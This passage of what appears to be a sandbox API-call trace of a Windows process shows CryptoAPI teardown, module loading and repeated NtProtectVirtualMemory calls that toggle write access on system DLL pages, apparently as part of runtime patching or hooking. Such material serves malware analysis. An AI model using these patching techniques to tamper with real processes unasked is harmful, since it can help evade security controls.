(This=0x6737128) returned 0x1 [0212.391] WbemLocator:IUnknown:Release (This=0x6737128) returned 0x0 [0212.391] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0212.391] WbemLocator:IUnknown:Release (This=0x6736dc8) returned 0x1 [0212.391] WbemLocator:IUnknown:Release (This=0x6736dc8) returned 0x0 [0212.391] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0212.392] WbemLocator:IUnknown:Release (This=0x6736f48) returned 0x1 [0212.392] WbemLocator:IUnknown:Release (This=0x6736f48) returned 0x0 [0212.392] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0212.392] WbemLocator:IUnknown:Release (This=0x6736dd8) returned 0x1 [0212.392] WbemLocator:IUnknown:Release (This=0x6736dd8) returned 0x0 [0212.392] CryptDestroyKey (hKey=0x77ae30) returned 1 [0212.392] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0212.392] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0212.393] CryptDestroyKey (hKey=0x77b3b0) returned 1 [0212.393] CryptReleaseContext (hProv=0x7a9d28, dwFlags=0x0) returned 1 [0212.393] CryptReleaseContext (hProv=0x7a9d28, dwFlags=0x0) returned 1 [0212.393] CryptDestroyKey (hKey=0x77b430) returned 1 [0212.393] CryptReleaseContext (hProv=0x7a9fd0, dwFlags=0x0) returned 1 [0212.393] CryptReleaseContext (hProv=0x7a9fd0, dwFlags=0x0) returned 1 [0212.393] CryptDestroyKey (hKey=0x77b0b0) returned 1 [0212.393] CryptReleaseContext (hProv=0x7aa058, dwFlags=0x0) returned 1 [0212.394] CryptReleaseContext (hProv=0x7aa058, dwFlags=0x0) returned 1 Thread: id = 6 os_tid = 0x9fc Thread: id = 7 os_tid = 0x604 [0084.536] SysReAllocStringLen (in: pbstr=0x5ddf41c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5ddf41c*="KERNEL32.DLL") returned 1 [0084.536] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0084.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0084.539] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0084.540] SysReAllocStringLen (in: pbstr=0x5ddf41c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5ddf41c*="KERNEL32.DLL") returned 1 [0084.540] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0084.540] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0084.543] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0084.543] SysReAllocStringLen (in: pbstr=0x5ddf3f8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5ddf3f8*="KERNEL32.DLL") returned 1 [0084.543] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0084.544] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0084.547] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0084.549] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0084.551] GetCurrentThreadId () returned 0x604 [0084.551] ResetEvent (hEvent=0xb8) returned 1 [0084.551] GetCurrentThreadId () returned 0x604 [0084.551] GetCurrentThreadId () returned 0x604 [0084.551] GetCurrentThreadId () returned 0x604 [0084.551] ResetEvent (hEvent=0xb8) returned 1 [0084.551] GetCurrentThreadId () returned 0x604 [0084.551] GetCurrentThreadId () returned 0x604 [0084.551] SetEvent (hEvent=0xbc) returned 1 [0084.551] SetEvent (hEvent=0xb8) returned 1 [0084.551] CloseHandle (hObject=0x330) returned 1 [0084.552] GetProcAddress (hModule=0x76d10000, lpProcName="NotifyServiceStatusChangeA") returned 0x76d1a11d [0085.304] GetCurrentThreadId () returned 0x604 [0085.304] ResetEvent (hEvent=0xb8) returned 1 [0085.304] GetCurrentThreadId () returned 0x604 [0085.304] GetCurrentThreadId () returned 0x604 [0085.304] GetCurrentThreadId () returned 0x604 [0085.304] GetCurrentThreadId () returned 0x604 [0085.304] ResetEvent (hEvent=0xb8) returned 1 [0085.304] GetCurrentThreadId () returned 0x604 [0085.304] GetCurrentThreadId () returned 0x604 [0085.304] SetEvent (hEvent=0xbc) returned 1 [0085.304] SetEvent (hEvent=0xb8) returned 1 [0085.304] CloseHandle (hObject=0x338) returned 1 Thread: id = 8 os_tid = 0x2c4 [0085.288] SysReAllocStringLen (in: pbstr=0x5fefae4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5fefae4*="KERNEL32.DLL") returned 1 [0085.288] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0085.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0085.291] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0085.292] SysReAllocStringLen (in: pbstr=0x5fefae4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5fefae4*="KERNEL32.DLL") returned 1 [0085.292] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0085.292] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0085.295] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0085.295] SysReAllocStringLen (in: pbstr=0x5fefac0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5fefac0*="KERNEL32.DLL") returned 1 [0085.295] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0085.295] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0085.298] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0085.301] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0174.202] SysReAllocStringLen (in: pbstr=0x5fefc3c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x5fefc3c*="KERNEL32.DLL") returned 1 [0174.202] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0174.203] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.211] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0174.211] GetCurrentThreadId () returned 0x2c4 [0174.211] ResetEvent (hEvent=0xb8) returned 1 [0174.211] GetCurrentThreadId () returned 0x2c4 [0174.211] GetCurrentThreadId () returned 0x2c4 [0174.211] GetCurrentThreadId () returned 0x2c4 [0174.211] GetCurrentThreadId () returned 0x2c4 [0174.211] ResetEvent (hEvent=0xb8) returned 1 [0174.212] GetCurrentThreadId () returned 0x2c4 [0174.212] GetCurrentThreadId () returned 0x2c4 [0174.212] SetEvent (hEvent=0xbc) returned 1 [0174.212] SetEvent (hEvent=0xb8) returned 1 [0174.212] CloseHandle (hObject=0x348) returned 1 [0174.212] GetCurrentThreadId () returned 0x2c4 [0174.212] ResetEvent (hEvent=0xb8) returned 1 [0174.213] GetCurrentThreadId () returned 0x2c4 [0174.213] GetCurrentThreadId () returned 0x2c4 [0174.213] GetCurrentThreadId () returned 0x2c4 [0174.213] GetCurrentThreadId () returned 0x2c4 [0174.213] ResetEvent (hEvent=0xb8) returned 1 [0174.213] GetCurrentThreadId () returned 0x2c4 [0174.213] GetCurrentThreadId () returned 0x2c4 [0174.213] SetEvent (hEvent=0xbc) returned 1 [0174.213] SetEvent (hEvent=0xb8) returned 1 [0174.213] CloseHandle (hObject=0x344) returned 1 Thread: id = 9 os_tid = 0x244 [0085.351] SysReAllocStringLen (in: pbstr=0x60ef97c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x60ef97c*="KERNEL32.DLL") returned 1 [0085.351] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0085.351] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0085.354] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0085.354] SysReAllocStringLen (in: pbstr=0x60ef97c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x60ef97c*="KERNEL32.DLL") returned 1 [0085.354] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0085.355] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0085.358] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0085.358] SysReAllocStringLen (in: pbstr=0x60ef958*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x60ef958*="KERNEL32.DLL") returned 1 [0085.358] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0085.358] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0085.361] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0085.364] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0086.501] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=9, lpWideCharStr=0x60eeb04, cchWideChar=2047 | out: lpWideCharStr="ole32.dll") returned 9 [0086.502] SysReAllocStringLen (in: pbstr=0x60efb08*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x60efb08*="ole32.dll") returned 1 [0086.502] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0086.502] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0086.502] GetLastError () returned 0x0 [0086.502] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0086.503] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0086.503] GetModuleFileNameA (in: hModule=0x76620000, lpFilename=0x60ef9f0, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0086.503] GetCurrentProcess () returned 0xffffffff [0086.503] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60efaf4*=0x766214a0, NumberOfBytesToProtect=0x60efaf8, NewAccessProtection=0x4, OldAccessProtection=0x60efb2c | out: BaseAddress=0x60efaf4*=0x76621000, NumberOfBytesToProtect=0x60efaf8, OldAccessProtection=0x60efb2c*=0x20) returned 0x0 [0086.504] GetCurrentProcess () returned 0xffffffff [0086.504] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60efaf4*=0x766214a0, NumberOfBytesToProtect=0x60efaf8, NewAccessProtection=0x20, OldAccessProtection=0x60efb2c | out: BaseAddress=0x60efaf4*=0x76621000, NumberOfBytesToProtect=0x60efaf8, OldAccessProtection=0x60efb2c*=0x4) returned 0x0 [0086.504] GetCurrentProcess () returned 0xffffffff [0086.504] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60efaf4*=0x766214b0, NumberOfBytesToProtect=0x60efaf8, NewAccessProtection=0x4, OldAccessProtection=0x60efb2c | out: BaseAddress=0x60efaf4*=0x76621000, NumberOfBytesToProtect=0x60efaf8, OldAccessProtection=0x60efb2c*=0x20) returned 0x0 [0086.504] GetCurrentProcess () returned 0xffffffff [0086.504] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60efaf4*=0x766214b0, NumberOfBytesToProtect=0x60efaf8, NewAccessProtection=0x20, OldAccessProtection=0x60efb2c | out: BaseAddress=0x60efaf4*=0x76621000, NumberOfBytesToProtect=0x60efaf8, OldAccessProtection=0x60efb2c*=0x4) returned 0x0 [0086.505] GetCurrentProcess () returned 0xffffffff [0086.505] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60efaf4*=0x766219a8, NumberOfBytesToProtect=0x60efaf8, NewAccessProtection=0x4, OldAccessProtection=0x60efb2c | out: BaseAddress=0x60efaf4*=0x76621000, NumberOfBytesToProtect=0x60efaf8, OldAccessProtection=0x60efb2c*=0x20) returned 0x0 [0086.505] GetCurrentProcess () returned 0xffffffff [0086.505] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60efaf4*=0x766219a8, NumberOfBytesToProtect=0x60efaf8, NewAccessProtection=0x20, OldAccessProtection=0x60efb2c | out: BaseAddress=0x60efaf4*=0x76621000, NumberOfBytesToProtect=0x60efaf8, OldAccessProtection=0x60efb2c*=0x4) returned 0x0 [0086.505] GetCurrentProcess () returned 0xffffffff [0086.505] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60efaf4*=0x766219ac, NumberOfBytesToProtect=0x60efaf8, NewAccessProtection=0x4, OldAccessProtection=0x60efb2c | out: BaseAddress=0x60efaf4*=0x76621000, NumberOfBytesToProtect=0x60efaf8, OldAccessProtection=0x60efb2c*=0x20) returned 0x0 [0086.506] GetCurrentProcess () returned 0xffffffff [0086.506] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60efaf4*=0x766219ac, NumberOfBytesToProtect=0x60efaf8, NewAccessProtection=0x20, OldAccessProtection=0x60efb2c | out: BaseAddress=0x60efaf4*=0x76621000, NumberOfBytesToProtect=0x60efaf8, OldAccessProtection=0x60efb2c*=0x4) returned 0x0 [0086.506] GetCurrentProcess () returned 0xffffffff [0086.506] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60efaf4*=0x76621a00, NumberOfBytesToProtect=0x60efaf8, NewAccessProtection=0x4, OldAccessProtection=0x60efb2c | out: BaseAddress=0x60efaf4*=0x76621000, NumberOfBytesToProtect=0x60efaf8, OldAccessProtection=0x60efb2c*=0x20) returned 0x0 [0086.506] GetCurrentProcess () returned 0xffffffff [0086.506] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60efaf4*=0x76621a00, NumberOfBytesToProtect=0x60efaf8, NewAccessProtection=0x20, OldAccessProtection=0x60efb2c | out: BaseAddress=0x60efaf4*=0x76621000, NumberOfBytesToProtect=0x60efaf8, OldAccessProtection=0x60efb2c*=0x4) returned 0x0 [0086.507] SetLastError (dwErrCode=0x0) [0086.507] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeEx") returned 0x766609ad [0086.507] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=8, lpWideCharStr=0x60eeb84, cchWideChar=2047 | out: lpWideCharStr="advapi32؎") returned 8 [0086.507] SysReAllocStringLen (in: pbstr=0x60efb88*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x60efb88*="advapi32") returned 1 [0086.507] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0086.507] GetModuleHandleA (lpModuleName="advapi32") returned 0x77710000 [0086.508] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteTreeA") returned 0x777534b3 [0086.508] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteTreeW") returned 0x777534a3 [0086.508] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemAlloc") returned 0x7666ea4c [0086.509] GetProcAddress (hModule=0x76620000, lpProcName="StringFromIID") returned 0x76633d96 [0086.530] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ae8, cbMultiByte=7, lpWideCharStr=0x60ee964, cchWideChar=2047 | out: lpWideCharStr="NSI.dll") returned 7 [0086.531] SysReAllocStringLen (in: pbstr=0x60ef968*=0x0, psz="NSI.dll", len=0x7 | out: pbstr=0x60ef968*="NSI.dll") returned 1 [0086.531] CharLowerBuffW (in: lpsz="NSI.dll", cchLength=0x7 | out: lpsz="nsi.dll") returned 0x7 [0086.531] LoadLibraryExA (lpLibFileName="NSI.dll", hFile=0x0, dwFlags=0x0) returned 0x77c10000 [0086.531] GetLastError () returned 0x0 [0086.531] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0086.532] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0086.532] GetModuleFileNameA (in: hModule=0x77c10000, lpFilename=0x60ef850, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0086.532] GetCurrentProcess () returned 0xffffffff [0086.532] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef954*=0x77c1101c, NumberOfBytesToProtect=0x60ef958, NewAccessProtection=0x4, OldAccessProtection=0x60ef98c | out: BaseAddress=0x60ef954*=0x77c11000, NumberOfBytesToProtect=0x60ef958, OldAccessProtection=0x60ef98c*=0x20) returned 0x0 [0086.532] GetCurrentProcess () returned 0xffffffff [0086.532] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef954*=0x77c1101c, NumberOfBytesToProtect=0x60ef958, NewAccessProtection=0x20, OldAccessProtection=0x60ef98c | out: BaseAddress=0x60ef954*=0x77c11000, NumberOfBytesToProtect=0x60ef958, OldAccessProtection=0x60ef98c*=0x4) returned 0x0 [0086.533] GetCurrentProcess () returned 0xffffffff [0086.533] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef954*=0x77c11024, NumberOfBytesToProtect=0x60ef958, NewAccessProtection=0x4, OldAccessProtection=0x60ef98c | out: BaseAddress=0x60ef954*=0x77c11000, NumberOfBytesToProtect=0x60ef958, OldAccessProtection=0x60ef98c*=0x20) returned 0x0 [0086.533] GetCurrentProcess () returned 0xffffffff [0086.533] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef954*=0x77c11024, NumberOfBytesToProtect=0x60ef958, NewAccessProtection=0x20, OldAccessProtection=0x60ef98c | out: BaseAddress=0x60ef954*=0x77c11000, NumberOfBytesToProtect=0x60ef958, OldAccessProtection=0x60ef98c*=0x4) returned 0x0 [0086.534] SetLastError (dwErrCode=0x0) [0086.534] GetProcAddress (hModule=0x77c10000, lpProcName="NsiAllocateAndGetTable") returned 0x77c11949 [0086.534] GetCurrentThreadId () returned 0x244 [0086.534] ResetEvent (hEvent=0xb8) returned 1 [0086.534] GetCurrentThreadId () returned 0x244 [0086.534] GetCurrentThreadId () returned 0x244 [0086.534] GetCurrentThreadId () returned 0x244 [0086.534] ResetEvent (hEvent=0xb8) returned 1 [0086.534] GetCurrentThreadId () returned 0x244 [0086.534] GetCurrentThreadId () returned 0x244 [0086.534] SetEvent (hEvent=0xbc) returned 1 [0086.534] SetEvent (hEvent=0xb8) returned 1 [0086.534] CloseHandle (hObject=0x390) returned 1 [0086.535] GetCurrentThreadId () returned 0x244 [0086.535] ResetEvent (hEvent=0xb8) returned 1 [0086.535] GetCurrentThreadId () returned 0x244 [0086.535] GetCurrentThreadId () returned 0x244 [0086.535] GetCurrentThreadId () returned 0x244 [0086.535] GetCurrentThreadId () returned 0x244 [0086.535] ResetEvent (hEvent=0xb8) returned 1 [0086.535] GetCurrentThreadId () returned 0x244 [0086.535] GetCurrentThreadId () returned 0x244 [0086.535] SetEvent (hEvent=0xbc) returned 1 [0086.535] SetEvent (hEvent=0xb8) returned 1 [0086.535] CloseHandle (hObject=0x390) returned 1 [0086.535] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=12, lpWideCharStr=0x60ee544, cchWideChar=2047 | out: lpWideCharStr="CFGMGR32.dll") returned 12 [0086.535] SysReAllocStringLen (in: pbstr=0x60ef548*=0x0, psz="CFGMGR32.dll", len=0xc | out: pbstr=0x60ef548*="CFGMGR32.dll") returned 1 [0086.535] CharLowerBuffW (in: lpsz="CFGMGR32.dll", cchLength=0xc | out: lpsz="cfgmgr32.dll") returned 0xc [0086.535] LoadLibraryExA (lpLibFileName="CFGMGR32.dll", hFile=0x0, dwFlags=0x0) returned 0x76be0000 [0086.848] GetLastError () returned 0x0 [0086.849] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0086.849] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0086.849] GetModuleFileNameA (in: hModule=0x76be0000, lpFilename=0x60ef430, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\CFGMGR32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0086.849] GetCurrentProcess () returned 0xffffffff [0086.849] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be1128, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x4, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x20) returned 0x0 [0086.849] GetCurrentProcess () returned 0xffffffff [0086.849] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be1128, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x20, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x4) returned 0x0 [0086.850] GetCurrentProcess () returned 0xffffffff [0086.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be1138, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x4, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x20) returned 0x0 [0086.850] GetCurrentProcess () returned 0xffffffff [0086.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be1138, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x20, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x4) returned 0x0 [0086.850] GetCurrentProcess () returned 0xffffffff [0086.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be117c, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x4, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x20) returned 0x0 [0086.850] GetCurrentProcess () returned 0xffffffff [0086.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be117c, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x20, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x4) returned 0x0 [0086.851] GetCurrentProcess () returned 0xffffffff [0086.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be1180, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x4, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x20) returned 0x0 [0086.851] GetCurrentProcess () returned 0xffffffff [0086.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be1180, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x20, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x4) returned 0x0 [0086.851] GetCurrentProcess () returned 0xffffffff [0086.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be1188, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x4, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x20) returned 0x0 [0086.851] GetCurrentProcess () returned 0xffffffff [0086.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be1188, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x20, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x4) returned 0x0 [0086.852] GetCurrentProcess () returned 0xffffffff [0086.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be11a4, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x4, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x20) returned 0x0 [0086.852] GetCurrentProcess () returned 0xffffffff [0086.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be11a4, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x20, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x4) returned 0x0 [0086.852] GetCurrentProcess () returned 0xffffffff [0086.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be11d4, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x4, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x20) returned 0x0 [0086.853] GetCurrentProcess () returned 0xffffffff [0086.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be11d4, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x20, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x4) returned 0x0 [0086.853] GetCurrentProcess () returned 0xffffffff [0086.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be11f8, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x4, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x20) returned 0x0 [0086.853] GetCurrentProcess () returned 0xffffffff [0086.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be11f8, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x20, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x4) returned 0x0 [0086.853] GetCurrentProcess () returned 0xffffffff [0086.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be11fc, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x4, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x20) returned 0x0 [0086.854] GetCurrentProcess () returned 0xffffffff [0086.854] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be11fc, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x20, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x4) returned 0x0 [0086.854] GetCurrentProcess () returned 0xffffffff [0086.854] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be1200, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x4, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x20) returned 0x0 [0086.854] GetCurrentProcess () returned 0xffffffff [0086.854] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x60ef534*=0x76be1200, NumberOfBytesToProtect=0x60ef538, NewAccessProtection=0x20, OldAccessProtection=0x60ef56c | out: BaseAddress=0x60ef534*=0x76be1000, NumberOfBytesToProtect=0x60ef538, OldAccessProtection=0x60ef56c*=0x4) returned 0x0 [0086.855] SetLastError (dwErrCode=0x0) [0086.855] GetProcAddress (hModule=0x76be0000, lpProcName="CM_Open_Class_Key_ExW") returned 0x76be833b [0086.856] GetProcAddress (hModule=0x74810000, lpProcName="ConvertInterfaceGuidToLuid") returned 0x74813f64 [0086.856] GetCurrentThreadId () returned 0x244 [0086.856] ResetEvent (hEvent=0xb8) returned 1 [0086.856] GetCurrentThreadId () returned 0x244 [0086.856] GetCurrentThreadId () returned 